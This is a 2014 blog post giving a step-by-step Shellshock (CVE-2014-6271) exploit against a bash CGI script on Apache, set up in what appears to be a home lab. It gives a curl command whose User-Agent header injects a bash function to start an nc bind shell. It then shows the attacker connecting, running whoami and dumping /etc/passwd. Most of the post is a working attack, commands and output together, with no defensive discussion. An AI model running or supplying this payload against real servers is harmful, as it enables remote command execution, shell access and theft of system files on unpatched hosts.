Thursday, September 25, 2014

how to get shell using the latest bash bug, SHELLSHOCK (CVE-2014-6271)

1- set up apache to host cgi script following this link
http://theamdara.blogspot.com/2014/09/setup-cgi.html

2- create test.sh in the the cgidir directory with the following content
#!/bin/bash

echo "Content-type: text/html"
echo ""

echo '<html>'
echo '<head>'
echo '<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">'
echo '<title>PoC</title>'
echo '</head>'
echo '<body>'
echo '<pre>'
/usr/bin/env
echo '</pre>'
echo '</body>'
echo '</html>'

exit 0


3- on attacker machine
exploit the bash bug to execute nc to listen for connection (nc must support -e option)

user@localhost$ curl -A '() { :; }; /bin/nc -p 3333 -l -e /bin/sh' http://192.168.202.5/cgidir/test.sh

4- getting the shell
user@localhost$ nc 192.168.202.5 3333
pwd
/usr/local/apache2/cgidir
whoami
www-data
hostname
debian

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
dara:x:1000:1000:dara,,,:/home/dara:/bin/bash
bind:x:104:106::/var/cache/bind:/bin/fals

No comments:

Post a Comment